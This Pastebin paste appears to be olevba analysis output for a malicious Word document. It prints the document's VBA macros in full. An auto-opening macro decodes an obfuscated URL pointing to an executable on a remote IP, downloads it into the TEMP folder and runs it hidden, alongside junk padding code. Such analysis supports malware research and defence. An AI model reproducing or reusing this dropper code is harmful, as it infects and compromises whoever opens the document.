SHARE
TWEET

Malicious Word macro

dynamoo Mar 13th, 2015 326 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. XML:MAS---- 2773kxh.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 2773kxh.doc
  10. Type: Word2003_XML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. z4vF73d
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO ÀâïàâÀ.bas
  27. in file: editdata.mso - OLE stream: u'VBA/\u0410\u0432\u043f\u0430\u0432\u0410'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Public Function IOVANMdhjbAO(ySIzNYGGtuUeqS As String) As String
  31. For QpHTHEyQNlU = 1 To Len(ySIzNYGGtuUeqS) Step 2
  32. IOVANMdhjbAO = IOVANMdhjbAO & Mid(ySIzNYGGtuUeqS, QpHTHEyQNlU, 1)
  33. Next
  34. End Function
  35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  36. ANALYSIS:
  37. No suspicious keyword or IOC found.
  38. -------------------------------------------------------------------------------
  39. VBA MACRO ÀÏÀÂÏàâïâ.bas
  40. in file: editdata.mso - OLE stream: u'VBA/\u0410\u041f\u0410\u0412\u041f\u0430\u0432\u043f\u0432'
  41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  42. #If VBA7 Then
  43.     Private Declare PtrSafe Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
  44.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  45.     ByVal ÏÀÌÎÐâûà As String, _
  46.     ByVal ÏÀÌÎÐâûàf As String, _
  47.     ByVal ÏÀÌÎÐâûàfd As Long, _
  48.     ByVal ÏÀÌÎÐâûàfds As LongPtr) As LongPtr
  49. #Else
  50.     Private Declare Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
  51.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  52.     ByVal ÏÀÌÎÐâûà As String, _
  53.     ByVal ÏÀÌÎÐâûàf As String, _
  54.     ByVal ÏÀÌÎÐâûàfd As Long, _
  55.     ByVal ÏÀÌÎÐâûàfds As Long) As Long
  56. #End If
  57. Sub z4vF73d()
  58. ïðïàðûâà IOVANMdhjbAO(Chr$(104) & Chr$(56) & Chr$(116) & Chr$(65) & Chr$(116) & Chr$(92) & Chr$(112) & Chr$(85) & Chr$(58) & Chr$(52) & Chr$(47) & Chr$(78) & Chr$(47) & Chr$(127) & Chr$(57) & Chr$(127) & Chr$(53) & Chr$(79) & Chr$(46) & Chr$(96) & Chr$(49) & Chr$(120) & Chr$(54) & Chr$(74) & Chr$(51) & Chr$(112) & Chr$(46) & Chr$(72) & Chr$(49) & Chr$(118) & Chr$(50) & Chr$(53) & Chr$(49) & Chr$(102) & Chr$(46) & Chr$(53) & Chr$(49) & Chr$(75) & Chr$(56) & Chr$(63) & Chr$(54) & Chr$(98) & Chr$(47) & Chr$(66) & Chr$(97) & Chr$(110) & Chr$(112) & Chr$(78) & Chr$(105) & Chr$(99) & Chr$(47) & Chr$(110) & Chr$(103) & Chr$(103) & Chr$(98) & Chr$(125) & Chr$(98) & Chr$(58) & Chr$(49) & Chr$(86) & Chr$(46) & Chr$(101) & Chr$(101) & Chr$(104) & Chr$(120) & Chr$(122) & Chr$(101) & Chr$(68)) _
  59. , Environ(IOVANMdhjbAO(Chr$(84) & Chr$(99) & Chr$(77) & Chr$(70) & Chr$(80) & Chr$(83))) & IOVANMdhjbAO(Chr$(92) & Chr$(97) & Chr$(71) & Chr$(129) & Chr$(72) & Chr$(81) & Chr$(106) & Chr$(79) & Chr$(107) & Chr$(110) & Chr$(100) & Chr$(91) & Chr$(102) & Chr$(96) & Chr$(103) & Chr$(80) & Chr$(46) & Chr$(128) & Chr$(101) & Chr$(84) & Chr$(120) & Chr$(43) & Chr$(101) & Chr$(39))
  60. End Sub
  61. Function ïðïàðûâà(zOF3 As String, Dm4y As String) As Boolean
  62. âûàûâÀÀâûà = ÌÐÎìîðÌÐÎàâï(0&, zOF3, Dm4y, 0&, 0&)
  63. ïðïàÀàï = Shell(Dm4y, 0)
  64. End Function
  65.  
  66.  
  67.  
  68.  
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70. ANALYSIS:
  71. +------------+--------------------+-----------------------------------------+
  72. | Type       | Keyword            | Description                             |
  73. +------------+--------------------+-----------------------------------------+
  74. | Suspicious | Lib                | May run code from a DLL                 |
  75. | Suspicious | Shell              | May run an executable file or a system  |
  76. |            |                    | command                                 |
  77. | Suspicious | Environ            | May read system environment variables   |
  78. | Suspicious | Chr                | May attempt to obfuscate specific       |
  79. |            |                    | strings                                 |
  80. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  81. +------------+--------------------+-----------------------------------------+
  82. -------------------------------------------------------------------------------
  83. VBA MACRO Class1.cls
  84. in file: editdata.mso - OLE stream: u'VBA/Class1'
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  86. Public Sub VJfmjcZhYHWzt89()
  87. Dim caEhbvHeVNIEE28 As Integer
  88. For caEhbvHeVNIEE28 = 8 To wn
  89. DoEvents
  90. Next caEhbvHeVNIEE28
  91. Dim DcsgpIlJKVLll87 As String
  92. DcsgpIlJKVLll87 = "UDMGtgGDgYjFI65"
  93. End Sub
  94.  
  95. Public Sub rEFykkBadCmlT28()
  96. Dim PxdhIsVstODSN96 As Integer
  97. For PxdhIsVstODSN96 = 6 To zo
  98. DoEvents
  99. Next PxdhIsVstODSN96
  100. Dim lyRYKztwOtcCv68 As String
  101. lyRYKztwOtcCv68 = "QpVdrqKVaheqW83"
  102. End Sub
  103.  
  104. Public Sub xHCiwNdMbiMXH41()
  105. Dim DMjDUoNwJkvod99 As Integer
  106. For DMjDUoNwJkvod99 = 6 To AZ
  107. DoEvents
  108. Next DMjDUoNwJkvod99
  109. Dim MbOCKZMnWgyDP71 As String
  110. MbOCKZMnWgyDP71 = "dLnHyOaEiCcXm17"
  111. End Sub
  112.  
  113. Public Sub pRsFNsbPhfYFW88()
  114. Dim hZLjOUpaCBMMS47 As Integer
  115. For hZLjOUpaCBMMS47 = 7 To Hd
  116. DoEvents
  117. Next hZLjOUpaCBMMS47
  118. Dim iqHqrfwpCwVKm36 As String
  119. iqHqrfwpCwVKm36 = "TZxKCjtsLEbMO94"
  120. End Sub
  121.  
  122. Public Sub qWpQUsRUDvlHS43()
  123. Dim IdGlnffOOYXKa12 As Integer
  124. For IdGlnffOOYXKa12 = 4 To BO
  125. DoEvents
  126. Next IdGlnffOOYXKa12
  127. Dim jYPxUyallTLis72 As String
  128. jYPxUyallTLis72 = "WIblPzwJHhazc55"
  129. End Sub
  130.  
  131. Public Sub ljeCsroJoUhyE78()
  132. Dim VlLLfBEgYlxNH62 As Integer
  133. For VlLLfBEgYlxNH62 = 3 To Uz
  134. DoEvents
  135. Next VlLLfBEgYlxNH62
  136. Dim BBwgLcWwNGMPI35 As String
  137. BBwgLcWwNGMPI35 = "gqyUHUrqCVfvX89"
  138. End Sub
  139.  
  140. Public Sub htVyaunRmFwQL32()
  141. Dim TjUvVjOmkCGbi21 As Integer
  142. For TjUvVjOmkCGbi21 = 8 To QX
  143. DoEvents
  144. Next TjUvVjOmkCGbi21
  145. Dim rLdSRlDmsMiEB93 As String
  146. rLdSRlDmsMiEB93 = "uBpzNGLNvRppY68"
  147. End Sub
  148.  
  149. Public Sub yETfojXKzCRAj76()
  150. Dim pOEEEDavfUYoV65 As Integer
  151. For pOEEEDavfUYoV65 = 1 To ej
  152. DoEvents
  153. Next pOEEEDavfUYoV65
  154. Dim mgSnlzcAerxTa65 As String
  155. mgSnlzcAerxTa65 = "ZlbRmltyNfIuf63"
  156. End Sub
  157.  
  158. Public Sub pEXQlfifgpFAb63()
  159. Dim kIPGmTHKqlBzS46 As Integer
  160. For kIPGmTHKqlBzS46 = 1 To fc
  161. DoEvents
  162. Next kIPGmTHKqlBzS46
  163. Dim TmBfAKqohhFMq17 As String
  164. TmBfAKqohhFMq17 = "oRtXhFaWkBPgf45"
  165. End Sub
  166.  
  167.  
  168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  169. ANALYSIS:
  170. No suspicious keyword or IOC found.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top